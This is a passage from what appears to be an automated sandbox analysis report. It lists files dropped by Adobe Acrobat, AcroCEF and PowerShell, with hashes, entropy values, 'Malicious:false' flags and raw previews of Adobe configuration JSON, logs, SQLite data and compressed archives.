                                                              Preview:{"analyticsData":{"responseGUID":"e2c3d99b-546a-463d-84bb-e5438fb31543","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1733673094104,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):286
                                                              Entropy (8bit):5.2747901957084595
                                                              Encrypted:false
                                                              SSDEEP:6:YEQXJ2HXPWqCLvWmSg1c2LjcWkHvR0YntDoAvJfshHHrPeUkwRe9:YvXKXPWLVT5LjIPBsGUUUkee9
                                                              MD5:936FE359C4E330249F28FBF78BE4CA14
                                                              SHA1:585CFBA5C0C30D243D4BAA0CF82A6679BB219909
                                                              SHA-256:4E654192E0D660947E2469B5DAC7F314B57505BF5E49BD0B306A71CC8DFE8E43
                                                              SHA-512:1DAD12536414CF379ADC3BA1DDE8609F9C835C0B40B8C310183CC8221067D8582B705F892074730A17E55C633508F802C7A02E6C677D2C483AF37E794B23E419
                                                              Malicious:false
                                                              Preview:{"analyticsData":{"responseGUID":"e2c3d99b-546a-463d-84bb-e5438fb31543","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1733673094104,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):282
                                                              Entropy (8bit):5.283584295578911
                                                              Encrypted:false
                                                              SSDEEP:6:YEQXJ2HXPWqCLvWmSg1c2LjcWkHvR0YntDoAvJTqgFCrPeUkwRe9:YvXKXPWLVT5LjIPBsGTq16Ukee9
                                                              MD5:6219656FBBE83F3666C1A6ADB66B937B
                                                              SHA1:1EDED3606C9B9FE78197EFB6EB382224055E82BC
                                                              SHA-256:E2BA2304E927E1635D86E8F16DBF17E1840CC379BB04EEAB1869A9C319C0FC39
                                                              SHA-512:0EB0D7FB086CBC81A4434886158491D0AFDBBCB8A56C140867CDD8E5EE92DBAFE318357823A92DD7A990894D8009297EB64C2D400EA08ED122BAC1B6586EBD3E
                                                              Malicious:false
                                                              Preview:{"analyticsData":{"responseGUID":"e2c3d99b-546a-463d-84bb-e5438fb31543","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1733673094104,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):4
                                                              Entropy (8bit):0.8112781244591328
                                                              Encrypted:false
                                                              SSDEEP:3:e:e
                                                              MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                              SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                              SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                              SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                              Malicious:false
                                                              Preview:....
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):2817
                                                              Entropy (8bit):5.145934248498581
                                                              Encrypted:false
                                                              SSDEEP:48:YLn6WTmfDIM2dKd4dEf1/+SOFGE+nFEtYxtDuMpcgZQ9WybX6:8n6WTmfDIM2dk4dEfV+SnEEWctDuMCav
                                                              MD5:BDE256376EFE3762ABE98FA49FB629E3
                                                              SHA1:33D68AD3C685C29179352144DC982947BAF0454E
                                                              SHA-256:44DD61E4EC051898592A87DC02625E5BEEC3F147335851E07917C73EC56C9FEE
                                                              SHA-512:5E43C6A768A28A494BCD4E9B19AAAC19178CEA8E2AB1A4F4EB52FB5B88EBCA6EB9BB31B8D2A780CE80829A44B274D487C4275508A2BD4E612C6B4E478DBCD7F6
                                                              Malicious:false
                                                              Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"d412f2a4a95814262a818bcc34e47fda","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":1122,"ts":1733496409000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"b59759ba3b50e2da5169330546682124","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":1164,"ts":1733496409000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"671d02553813f9eda6b997f2c159b3fb","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1733496409000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"f41eb3ca4f75642be7b63f1dfb33385c","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1733496408000},{"id":"DC_Reader_Edit_LHP_Banner","info":{"dg":"33810e774239bade1f83f8af11cc991c","sid":"DC_Reader_Edit_LHP_Banner"},"mimeType":"file","size":1102,"ts":1733496408000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"91fc3a753fe2b3a6772ce1b6cc615257","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 26, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 26
                                                              Category:dropped
                                                              Size (bytes):12288
                                                              Entropy (8bit):1.3650298386460242
                                                              Encrypted:false
                                                              SSDEEP:24:TLBx/XYKQvGJF7urs9S6bqyKn6ylSTofcNqDuEJz0XKdqEKfS8EKfM1ba8Jz0F:Tll2GL7msMcKTlS8fcsuENfI82
                                                              MD5:2C53AA343093475CC479057D3EA766AC
                                                              SHA1:20E9527CE056303CD3593E68DB7F80E6DDB9D5F8
                                                              SHA-256:6D705688F8D9ECAD78DF9230AA27685176BA7C433D110126F0CA5FD86BFA3E13
                                                              SHA-512:E1EB7B8850ED7E36AE5B4C020DD5B80F5BC2B29C0BFF1C372B1E3C4DA290A92B517DA89B3368AC1194678529A407AA5B4BD4CFCFBEA05BB41CD6978BAD0D8D1D
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:SQLite Rollback Journal
                                                              Category:dropped
                                                              Size (bytes):8720
                                                              Entropy (8bit):1.8433417105550125
                                                              Encrypted:false
                                                              SSDEEP:24:7+tLwZ6bqyKn6ylSTofcNqDuEJz0+KdqEKfS8EKfM1banbqr+qLKufx/XYKQvGJ8:7ML+cKTlS8fcsuE0fIW+qGufl2GL7msK
                                                              MD5:04FD617F237227846ED5B794C6C7C75A
                                                              SHA1:950D35CECD62552C42D4ADB05B7C942BC07B4C7B
                                                              SHA-256:04D4B782A5C173B9936DD3939AD7D92EFCEFA457F67640DADE7FB0C576556C8D
                                                              SHA-512:3E7C8968A2805C56F5534B09DDD18CA9402C4284DDC4114086D45F7E806BE1EEB5ACCE279DA4806C1682D88AA2AC8576595F9D9C9BC73491AE8A1F7DEAC83FB7
                                                              Malicious:false
                                                              Preview:.... .c..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................^..^.^.^.^.^.^.^.-.-.-.-.-.-.-.-.-.-.-........................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):66726
                                                              Entropy (8bit):5.392739213842091
                                                              Encrypted:false
                                                              SSDEEP:768:RNOpblrU6TBH44ADKZEgdNyPciqC/uGuru6oDwJFeYMGSKWyYyu:6a6TZ44ADE2kiSrFJ8T9KtK
                                                              MD5:D9E23ABD95D6E43482D19C99F3AAABEE
                                                              SHA1:3A5677760C72A2C2DE3AB3C32A4AC250E03CF52C
                                                              SHA-256:1E6FF135F557114808ED9B1D23AD5BCEB6D214BA5F20DD9CFC9AE2B21403282C
                                                              SHA-512:86207B9EF52776F6F0531555E1FA0FF8551DF49D3F004372D38211688EA4F753EBE84BB524DAEF16C9014D852DDF83E0AE55B10ECBB8866AFD6F9986F031A033
                                                              Malicious:false
                                                              Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):64
                                                              Entropy (8bit):0.34726597513537405
                                                              Encrypted:false
                                                              SSDEEP:3:Nlll:Nll
                                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                              Malicious:false
                                                              Preview:@...e...........................................................
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):246
                                                              Entropy (8bit):3.5197430193686525
                                                              Encrypted:false
                                                              SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8V6qt:Qw946cPbiOxDlbYnuRKkd
                                                              MD5:8CCC34D10210641042087F55D78E0E54
                                                              SHA1:0F57061847B1C17417926E2B2AD307039D390CE2
                                                              SHA-256:4AFFDC9CD19035F0FACE0880023250F6730E3BF66211AC3467D9BC0F6C6A0D75
                                                              SHA-512:2913C1D51A7C11358D2BE7BF51C9E21723BD4444666C74F02856FDAAE0B1518D0113E6E72AC0AB296DD20E80D7957B0C105DDBAC30F649B7BB137E257B62EF22
                                                              Malicious:false
                                                              Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .0.6./.1.2./.2.0.2.4. . .0.9.:.4.6.:.4.4. .=.=.=.....
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:ASCII text, with very long lines (393)
                                                              Category:dropped
                                                              Size (bytes):16525
                                                              Entropy (8bit):5.330589339471305
                                                              Encrypted:false
                                                              SSDEEP:384:usQfQQjZyDzISMjg0svDBjA49Y0/sQHpMVhrSWD0Wny6WxIWd44mJmtaEKHvMMwh:Ink
                                                              MD5:5BC0A308794F062FEC40F3016568DF9F
                                                              SHA1:14149448191AB45E99011CBBEF39F2A9A03A0D15
                                                              SHA-256:00D910C49F2885F6810F4019A916EFA52F12881CBF1525853D0C184E1B796473
                                                              SHA-512:CF12E0787C1C2A129BE61C4572CF8A28FC48039B2ADFD1816E58078D8DD900771442F210C545AD9B3F4EAEC23F6F1480F7BBF262B6A631160B20D0785BC17242
                                                              Malicious:false
                                                              Preview:SessionID=eddad23d-dbc6-40b3-ba9e-21a55d862f0a.1696497318171 Timestamp=2023-10-05T10:15:18:171+0100 ThreadID=7060 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=eddad23d-dbc6-40b3-ba9e-21a55d862f0a.1696497318171 Timestamp=2023-10-05T10:15:18:172+0100 ThreadID=7060 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=eddad23d-dbc6-40b3-ba9e-21a55d862f0a.1696497318171 Timestamp=2023-10-05T10:15:18:172+0100 ThreadID=7060 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=eddad23d-dbc6-40b3-ba9e-21a55d862f0a.1696497318171 Timestamp=2023-10-05T10:15:18:172+0100 ThreadID=7060 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=eddad23d-dbc6-40b3-ba9e-21a55d862f0a.1696497318171 Timestamp=2023-10-05T10:15:18:172+0100 ThreadID=7060 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):15114
                                                              Entropy (8bit):5.359813390514335
                                                              Encrypted:false
                                                              SSDEEP:384:usedWgL/lyv9KApRJy6FXqTvEtr8fkouzMgMeaurKxGw+jMj5c4TJAJsWEGSOayu:aoY
                                                              MD5:FC46EFBE155743409FD543083403DE6D
                                                              SHA1:03AE706BEB87810A2B5043EFB25622E9D7193B34
                                                              SHA-256:2A7ABAEF44D5148AE75D5F99005C82AC8821FF626ED3806C726F0057B0713ED9
                                                              SHA-512:A8F6831C29B6140EAA7F23AF2E0FD28FCA2F8390B809A6B9B338B018CC0DBCA9A2AB3DF4B35B9C9B75B0EE4B6723D283A5C99C710E8EB96925C79592CEF2B401
                                                              Malicious:false
                                                              Preview:SessionID=18d98708-b58c-4298-8e05-092a72455d34.1733496398623 Timestamp=2024-12-06T09:46:38:623-0500 ThreadID=6060 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=18d98708-b58c-4298-8e05-092a72455d34.1733496398623 Timestamp=2024-12-06T09:46:38:624-0500 ThreadID=6060 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=18d98708-b58c-4298-8e05-092a72455d34.1733496398623 Timestamp=2024-12-06T09:46:38:624-0500 ThreadID=6060 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=18d98708-b58c-4298-8e05-092a72455d34.1733496398623 Timestamp=2024-12-06T09:46:38:624-0500 ThreadID=6060 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=18d98708-b58c-4298-8e05-092a72455d34.1733496398623 Timestamp=2024-12-06T09:46:38:624-0500 ThreadID=6060 Component=ngl-lib_NglAppLib Description="SetConf
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):29752
                                                              Entropy (8bit):5.402079934207563
                                                              Encrypted:false
                                                              SSDEEP:192:icbENIn5cbqlcbgIpLcbJcb4I5jcbKcbQIrxcbmdcb0IWAcbB:8qnXopZ50roWP
                                                              MD5:84B6FD5588075EB77B216A13F95D96CA
                                                              SHA1:1DAE3C4E3380F23F14F807FDDA358AD9234D9247
                                                              SHA-256:A006DCB70E5F6374A3AA99EEE4D247A7F84CB8DF87540D809912D4E478BBCEC8
                                                              SHA-512:8423487E3C418BB5BFB3600AAB611E2F47D0776BA7E6CB8133E7132A555E83806C15BD0FDF4AF04DDEB50C6422E55A601539CB2E3D0A74F18028947D5D708D8E
                                                              Malicious:false
                                                              Preview:05-10-2023 10:01:02:.---2---..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 10:01:02:.Closing File..05-10-
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                              Category:dropped
                                                              Size (bytes):1407294
                                                              Entropy (8bit):7.97605879016224
                                                              Encrypted:false
                                                              SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo
                                                              MD5:A0CFC77914D9BFBDD8BC1B1154A7B364
                                                              SHA1:54962BFDF3797C95DC2A4C8B29E873743811AD30
                                                              SHA-256:81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
                                                              SHA-512:74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE
                                                              Malicious:false
                                                              Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                              Category:dropped
                                                              Size (bytes):386528
                                                              Entropy (8bit):7.9736851559892425
                                                              Encrypted:false
                                                              SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                              MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                              SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                              SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                              SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                              Malicious:false
                                                              Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                              Category:dropped
                                                              Size (bytes):1419751
                                                              Entropy (8bit):7.976496077007677
                                                              Encrypted:false
                                                              SSDEEP:24576:/rwYIGNP4mOWL07oBGZ1dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:TwZG6bWLxBGZN3mlind9i4ufFXpAXkru
                                                              MD5:95F182500FC92778102336D2D5AADCC8
                                                              SHA1:BEC510B6B3D595833AF46B04C5843B95D2A0A6C9
                                                              SHA-256:9F9C041D7EE1DA404E53022D475B9E6D5924A17C08D5FDEC58C0A1DCDCC4D4C9
                                                              SHA-512:D7C022459486D124CC6CDACEAD8D46E16EDC472F4780A27C29D98B35AD01A9BA95F62155433264CC12C32BFF384C7ECAFCE0AC45853326CBC622AE65EE0D90BA
                                                              Malicious:false
                                                              Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                              Category:dropped
                                                              Size (bytes):758601
                                                              Entropy (8bit):7.98639316555857
                                                              Encrypted:false
                                                              SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                              MD5:3A49135134665364308390AC398006F1
                                                              SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
